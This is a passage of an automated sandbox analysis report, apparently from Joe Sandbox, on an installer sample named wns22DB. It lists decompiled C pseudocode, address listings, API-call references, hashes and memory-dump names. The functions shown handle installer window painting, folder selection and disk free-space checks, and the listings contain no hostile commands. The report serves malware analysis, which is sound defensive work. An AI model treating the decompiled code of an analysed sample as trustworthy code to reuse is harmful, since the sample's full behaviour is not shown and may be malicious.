                                                                                                                                                                                                  0x00404726
                                                                                                                                                                                                  0x0040472e
                                                                                                                                                                                                  0x0040473c
                                                                                                                                                                                                  0x00404742
                                                                                                                                                                                                  0x00404742
                                                                                                                                                                                                  0x00404702
                                                                                                                                                                                                  0x0040474c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00404757
                                                                                                                                                                                                  0x0040475b
                                                                                                                                                                                                  0x0040476b
                                                                                                                                                                                                  0x0040476b
                                                                                                                                                                                                  0x00404771
                                                                                                                                                                                                  0x0040477d
                                                                                                                                                                                                  0x0040477d
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00404781
                                                                                                                                                                                                  0x0040474c
                                                                                                                                                                                                  0x00404668
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040467a
                                                                                                                                                                                                  0x0040467f
                                                                                                                                                                                                  0x00404685
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004046ae
                                                                                                                                                                                                  0x004046b0
                                                                                                                                                                                                  0x004046b5
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004046b5
                                                                                                                                                                                                  0x00404668
                                                                                                                                                                                                  0x00404536
                                                                                                                                                                                                  0x00404539
                                                                                                                                                                                                  0x0040453e
                                                                                                                                                                                                  0x0040454f
                                                                                                                                                                                                  0x0040454f
                                                                                                                                                                                                  0x00404557
                                                                                                                                                                                                  0x0040455a
                                                                                                                                                                                                  0x0040455e
                                                                                                                                                                                                  0x00404561
                                                                                                                                                                                                  0x00404565
                                                                                                                                                                                                  0x00404568
                                                                                                                                                                                                  0x0040456b
                                                                                                                                                                                                  0x0040456e
                                                                                                                                                                                                  0x00404575
                                                                                                                                                                                                  0x00404577
                                                                                                                                                                                                  0x00404577
                                                                                                                                                                                                  0x00404581
                                                                                                                                                                                                  0x0040458e
                                                                                                                                                                                                  0x00404598
                                                                                                                                                                                                  0x0040459d
                                                                                                                                                                                                  0x004045a0
                                                                                                                                                                                                  0x004045a5
                                                                                                                                                                                                  0x004045bc
                                                                                                                                                                                                  0x004045c3
                                                                                                                                                                                                  0x004045d6
                                                                                                                                                                                                  0x004045d9
                                                                                                                                                                                                  0x004045ed
                                                                                                                                                                                                  0x004045f4
                                                                                                                                                                                                  0x004045f9
                                                                                                                                                                                                  0x004045fe
                                                                                                                                                                                                  0x004045fe
                                                                                                                                                                                                  0x0040460c
                                                                                                                                                                                                  0x0040461a
                                                                                                                                                                                                  0x0040462c
                                                                                                                                                                                                  0x00404631
                                                                                                                                                                                                  0x00404641
                                                                                                                                                                                                  0x00404643
                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CheckDlgButton.USER32 ref: 004045BC
                                                                                                                                                                                                  • GetDlgItem.USER32 ref: 004045D0
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                                                                                                                                                                  • GetSysColor.USER32(?), ref: 004045FE
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                                                                                                                  • GetDlgItem.USER32 ref: 0040469A
                                                                                                                                                                                                  • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                                                                                                                  • GetDlgItem.USER32 ref: 004046CC
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 00404720
                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                                                                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                                                                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                                  • String ID: ExecToStack$N
                                                                                                                                                                                                  • API String ID: 3103080414-2616698697
                                                                                                                                                                                                  • Opcode ID: ee6812b55728e13701025233a8a1636c33168640e361f3cefbda46e1e37430c8
                                                                                                                                                                                                  • Instruction ID: 4cd1da19937af119875355adca30567c2743cec9092c6b5b68c8bc3b1ab06c36
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee6812b55728e13701025233a8a1636c33168640e361f3cefbda46e1e37430c8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 176181B1900209BFDB109F60DD85EAA7B69FB84354F00853AFB05B72E1DB789D51CB98
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                                                                                  			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x470254;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x468240, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x470248;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                                                                                                                                                                                  0x0040100a
                                                                                                                                                                                                  0x00401039
                                                                                                                                                                                                  0x00401047
                                                                                                                                                                                                  0x0040104d
                                                                                                                                                                                                  0x00401051
                                                                                                                                                                                                  0x0040105b
                                                                                                                                                                                                  0x00401061
                                                                                                                                                                                                  0x00401064
                                                                                                                                                                                                  0x004010f3
                                                                                                                                                                                                  0x00401089
                                                                                                                                                                                                  0x0040108c
                                                                                                                                                                                                  0x004010a6
                                                                                                                                                                                                  0x004010bd
                                                                                                                                                                                                  0x004010cc
                                                                                                                                                                                                  0x004010cf
                                                                                                                                                                                                  0x004010d5
                                                                                                                                                                                                  0x004010d9
                                                                                                                                                                                                  0x004010e4
                                                                                                                                                                                                  0x004010ed
                                                                                                                                                                                                  0x004010ef
                                                                                                                                                                                                  0x004010ef
                                                                                                                                                                                                  0x00401100
                                                                                                                                                                                                  0x00401105
                                                                                                                                                                                                  0x0040110d
                                                                                                                                                                                                  0x00401110
                                                                                                                                                                                                  0x00401112
                                                                                                                                                                                                  0x00401118
                                                                                                                                                                                                  0x0040111f
                                                                                                                                                                                                  0x00401126
                                                                                                                                                                                                  0x00401130
                                                                                                                                                                                                  0x00401142
                                                                                                                                                                                                  0x00401156
                                                                                                                                                                                                  0x00401160
                                                                                                                                                                                                  0x00401165
                                                                                                                                                                                                  0x00401165
                                                                                                                                                                                                  0x00401110
                                                                                                                                                                                                  0x0040116e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00401178
                                                                                                                                                                                                  0x00401010
                                                                                                                                                                                                  0x00401013
                                                                                                                                                                                                  0x00401015
                                                                                                                                                                                                  0x0040101f
                                                                                                                                                                                                  0x0040101f
                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                  • GetClientRect.USER32 ref: 0040105B
                                                                                                                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                  • FillRect.USER32 ref: 004010E4
                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                  • DrawTextW.USER32(00000000,00468240,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                  • String ID: F
                                                                                                                                                                                                  • API String ID: 941294808-1304234792
                                                                                                                                                                                                  • Opcode ID: d1a6ac0749d5adbba1104fe8f7c5c271f621e3b3c45a8bc66e6bce868fb748d7
                                                                                                                                                                                                  • Instruction ID: 5ab7a9dfb5d1aa1389ec6db6610c78830fc9e5957017c9b4d31100662f95375f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d1a6ac0749d5adbba1104fe8f7c5c271f621e3b3c45a8bc66e6bce868fb748d7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14418C71800209AFCF058F95DE459AF7BB9FF44314F00842EF591AA1A0CB78D954DFA4
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00404850 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 78%
                                                                                                                                                                                                  			E00404850(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x43e700;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xe) + L"start OK\r\n";
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405A32(0x3fb, _t146);
					E0040667C(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405A32(0x3fb, _t146);
							if(E00405DC5(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E004063E8(0x4366f8, _t146);
							_t87 = E004067C2(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E004063E8(0x4366f8, _t146);
								_t89 = E00405D68(0x4366f8);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x4366f8,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x4366f8) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x4366f8,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405D09(0x4366f8);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x4366f8) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404CED(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x46821c + 0x10)) != _t158) {
									E00404CD5(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x4366e8);
									} else {
										E00404C0C(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x470304 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E00404381(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x446718 == _t158) {
									E004047A9();
								}
								 *0x446718 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x446728;
							_v60 = E00404BA6;
							_v56 = _t146;
							_v68 = E0040640A(_t146, 0x446728, _t167, 0x43a700, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405CBD(_t146);
								_t125 =  *((intOrPtr*)( *0x470254 + 0x11c));
								if( *((intOrPtr*)( *0x470254 + 0x11c)) != 0 && _t146 == 0x4c5000) {
									E0040640A(_t146, 0x446728, _t167, 0, _t125);
									if(lstrcmpiW(0x4601e0, 0x446728) != 0) {
										lstrcatW(_t146, 0x4601e0);
									}
								}
								 *0x446718 =  *0x446718 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405D34(_t146) != 0 && E00405D68(_t146) == 0) {
						E00405CBD(_t146);
					}
					 *0x468218 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E0040435F(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E0040435F(_t167);
					E00404394(_t166);
					_t138 = E004067C2(7);
					if(_t138 == 0) {
						L53:
						return E004043C6(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                                                                                                                                                                                                  0x00404850
                                                                                                                                                                                                  0x00404856
                                                                                                                                                                                                  0x0040485c
                                                                                                                                                                                                  0x00404869
                                                                                                                                                                                                  0x00404877
                                                                                                                                                                                                  0x0040487a
                                                                                                                                                                                                  0x00404882
                                                                                                                                                                                                  0x00404888
                                                                                                                                                                                                  0x00404888
                                                                                                                                                                                                  0x00404894
                                                                                                                                                                                                  0x00404897
                                                                                                                                                                                                  0x00404905
                                                                                                                                                                                                  0x0040490c
                                                                                                                                                                                                  0x004049e3
                                                                                                                                                                                                  0x004049ea
                                                                                                                                                                                                  0x004049f9
                                                                                                                                                                                                  0x004049f9
                                                                                                                                                                                                  0x004049fd
                                                                                                                                                                                                  0x00404a07
                                                                                                                                                                                                  0x00404a14
                                                                                                                                                                                                  0x00404a16
                                                                                                                                                                                                  0x00404a16
                                                                                                                                                                                                  0x00404a24
                                                                                                                                                                                                  0x00404a2b
                                                                                                                                                                                                  0x00404a32
                                                                                                                                                                                                  0x00404a35
                                                                                                                                                                                                  0x00404a71
                                                                                                                                                                                                  0x00404a73
                                                                                                                                                                                                  0x00404a79
                                                                                                                                                                                                  0x00404a7e
                                                                                                                                                                                                  0x00404a82
                                                                                                                                                                                                  0x00404a84
                                                                                                                                                                                                  0x00404a84
                                                                                                                                                                                                  0x00404aa0
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00404aa2
                                                                                                                                                                                                  0x00404aa5
                                                                                                                                                                                                  0x00404ab3
                                                                                                                                                                                                  0x00404ab9
                                                                                                                                                                                                  0x00404aba
                                                                                                                                                                                                  0x00404abd
                                                                                                                                                                                                  0x00404ac0
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00404ac0
                                                                                                                                                                                                  0x00404a37
                                                                                                                                                                                                  0x00404a39
                                                                                                                                                                                                  0x00404a3d
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00404a3f
                                                                                                                                                                                                  0x00404a3f
                                                                                                                                                                                                  0x00404a4c
                                                                                                                                                                                                  0x00404a51
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00404a55
                                                                                                                                                                                                  0x00404a57
                                                                                                                                                                                                  0x00404a57
                                                                                                                                                                                                  0x00404a60
                                                                                                                                                                                                  0x00404a62
                                                                                                                                                                                                  0x00404a67
                                                                                                                                                                                                  0x00404a6a
                                                                                                                                                                                                  0x00404a6f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00404a6f
                                                                                                                                                                                                  0x00404acc
                                                                                                                                                                                                  0x00404ad6
                                                                                                                                                                                                  0x00404ad9
                                                                                                                                                                                                  0x00404adc
                                                                                                                                                                                                  0x00404ae3
                                                                                                                                                                                                  0x00404ae3
                                                                                                                                                                                                  0x00404ae5
                                                                                                                                                                                                  0x00404ae5
                                                                                                                                                                                                  0x00404aea
                                                                                                                                                                                                  0x00404aec
                                                                                                                                                                                                  0x00404af4
                                                                                                                                                                                                  0x00404afb
                                                                                                                                                                                                  0x00404afd
                                                                                                                                                                                                  0x00404b08
                                                                                                                                                                                                  0x00404b08
                                                                                                                                                                                                  0x00404afd
                                                                                                                                                                                                  0x00404b18
                                                                                                                                                                                                  0x00404b22
                                                                                                                                                                                                  0x00404b2a
                                                                                                                                                                                                  0x00404b45
                                                                                                                                                                                                  0x00404b2c
                                                                                                                                                                                                  0x00404b35
                                                                                                                                                                                                  0x00404b35
                                                                                                                                                                                                  0x00404b2a
                                                                                                                                                                                                  0x00404b4a
                                                                                                                                                                                                  0x00404b4f
                                                                                                                                                                                                  0x00404b54
                                                                                                                                                                                                  0x00404b5d
                                                                                                                                                                                                  0x00404b5d
                                                                                                                                                                                                  0x00404b66
                                                                                                                                                                                                  0x00404b68
                                                                                                                                                                                                  0x00404b68
                                                                                                                                                                                                  0x00404b74
                                                                                                                                                                                                  0x00404b7c
                                                                                                                                                                                                  0x00404b86
                                                                                                                                                                                                  0x00404b86
                                                                                                                                                                                                  0x00404b8b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00404b8b
                                                                                                                                                                                                  0x00404a35
                                                                                                                                                                                                  0x004049ec
                                                                                                                                                                                                  0x004049f3
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004049f3
                                                                                                                                                                                                  0x00404912
                                                                                                                                                                                                  0x0040491b
                                                                                                                                                                                                  0x00404935
                                                                                                                                                                                                  0x0040493a
                                                                                                                                                                                                  0x00404944
                                                                                                                                                                                                  0x0040494b
                                                                                                                                                                                                  0x00404957
                                                                                                                                                                                                  0x0040495a
                                                                                                                                                                                                  0x0040495d
                                                                                                                                                                                                  0x00404964
                                                                                                                                                                                                  0x0040496c
                                                                                                                                                                                                  0x0040496f
                                                                                                                                                                                                  0x00404973
                                                                                                                                                                                                  0x0040497a
                                                                                                                                                                                                  0x00404982
                                                                                                                                                                                                  0x004049dc
                                                                                                                                                                                                  0x00404984
                                                                                                                                                                                                  0x00404985
                                                                                                                                                                                                  0x0040498c
                                                                                                                                                                                                  0x00404996
                                                                                                                                                                                                  0x0040499e
                                                                                                                                                                                                  0x004049ab
                                                                                                                                                                                                  0x004049bf
                                                                                                                                                                                                  0x004049c3
                                                                                                                                                                                                  0x004049c3
                                                                                                                                                                                                  0x004049bf
                                                                                                                                                                                                  0x004049c8
                                                                                                                                                                                                  0x004049d5
                                                                                                                                                                                                  0x004049d5
                                                                                                                                                                                                  0x00404982
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040493a
                                                                                                                                                                                                  0x00404928
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040492e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00404899
                                                                                                                                                                                                  0x004048a6
                                                                                                                                                                                                  0x004048af
                                                                                                                                                                                                  0x004048bc
                                                                                                                                                                                                  0x004048bc
                                                                                                                                                                                                  0x004048c3
                                                                                                                                                                                                  0x004048c9
                                                                                                                                                                                                  0x004048d2
                                                                                                                                                                                                  0x004048d5
                                                                                                                                                                                                  0x004048d8
                                                                                                                                                                                                  0x004048e0
                                                                                                                                                                                                  0x004048e3
                                                                                                                                                                                                  0x004048e6
                                                                                                                                                                                                  0x004048ec
                                                                                                                                                                                                  0x004048f3
                                                                                                                                                                                                  0x004048fa
                                                                                                                                                                                                  0x00404b91
                                                                                                                                                                                                  0x00404ba3
                                                                                                                                                                                                  0x00404900
                                                                                                                                                                                                  0x00404903
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00404903
                                                                                                                                                                                                  0x004048fa

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetDlgItem.USER32 ref: 0040489F
                                                                                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(ExecToStack,00446728,00000000,?,?), ref: 004049B7
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,ExecToStack), ref: 004049C3
                                                                                                                                                                                                  • SetDlgItemTextW.USER32 ref: 004049D5
                                                                                                                                                                                                    • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00002000,00404A0C), ref: 00405A45
                                                                                                                                                                                                    • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,004D5000,004D5000,004C1000,00403480,004D5000,746AFAA0,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                                                                                                                    • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                                                                                                                    • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,004D5000,004D5000,004C1000,00403480,004D5000,746AFAA0,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                                                                                                                    • Part of subcall function 0040667C: CharPrevW.USER32(?,?,004D5000,004D5000,004C1000,00403480,004D5000,746AFAA0,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(004366F8,?,?,0000040F,?,004366F8,004366F8,?,00000001,004366F8,?,?,000003FB,?), ref: 00404A98
                                                                                                                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                                                                                                                    • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00446728,00446728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                                                                                                                    • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                                                                                                                    • Part of subcall function 00404C0C: SetDlgItemTextW.USER32 ref: 00404CC9
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
